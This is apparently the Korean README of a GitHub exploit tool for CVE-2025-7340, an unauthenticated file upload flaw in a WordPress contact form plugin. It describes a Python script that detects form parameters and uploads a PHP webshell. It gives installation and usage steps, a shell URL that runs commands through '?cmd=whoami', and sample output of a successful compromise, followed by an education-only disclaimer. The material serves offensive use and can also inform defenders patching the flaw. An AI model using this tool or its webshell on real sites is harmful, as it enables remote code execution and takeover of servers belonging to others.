
HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - 인증되지 않은 임의 파일 업로드
CVE: CVE-2025-7340
CVSS: 9.8 (치명적)
WordPress용 HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. 플러그인은 temp_file_upload 함수에서 파일 형식 검증이 누락되어 2.2.1을 포함한 모든 버전에서 임의 파일 업로드에 취약합니다.
이로 인해 인증되지 않은 공격자가 서버에 임의 파일을 업로드할 수 있으며, 잠재적으로 원격 코드 실행(RCE) 으로 이어질 수 있습니다.
이 저장소에는 취약한 양식을 자동으로 찾고 웹쉘을 대상 사이트에 업로드하는 Python 익스플로잇 스크립트가 포함되어 있습니다.
스크립트는 필요한 매개변수(nonce, form_id, ajax endpoint)를 지능적으로 감지하고 PHP 셸을 취약한 경로에 업로드합니다.
✅ 취약한 양식 URL 예:
http://target.com/contact/
✅ 취약한 양식은 반드시 -u 옵션에 전달한 페이지에 있어야 합니다.
스크립트를 실행하기 전에 필요한 Python 모듈을 설치하세요:
pip install -r requirements.txt
requirements.txt의 내용:
requests
colorama
usage: CVE-2025-7340.py [-h]
CVE-2025-7340 - 인증되지 않은 임의 파일 업로드 익스플로잇 | 작성자: Khaled Alenazi (Nxploited)
options:
-h, --help 도움말 메시지를 표시하고 종료합니다
-u, --url URL 대상 URL (예: http(s)://target.com)
| 옵션 | 설명 |
|---|---|
-h, --help | 도움말 메시지를 표시하고 종료합니다 |
-u, --url URL | 대상 URL (예: http(s)://target.com/contact) |
익스플로잇이 성공적으로 완료되면 업로드된 셸에 제공된 경로로 접근할 수 있습니다.
?cmd=<your_command>를 추가하여 시스템 명령을 실행하세요.
✅ 예시:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...
[+] Exploit Successfully!
Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
이 도구는 교육 및 연구 목적으로만 제공됩니다.
저자는 이 코드의 사용으로 인한 손해나 오용에 대해 책임을 지지 않습니다.
모든 시스템에 테스트를 수행하기 전에 반드시 명시적 허가를 받으십시오.
Khaled Alenazi (Nxploited)
GitHub: Nxploited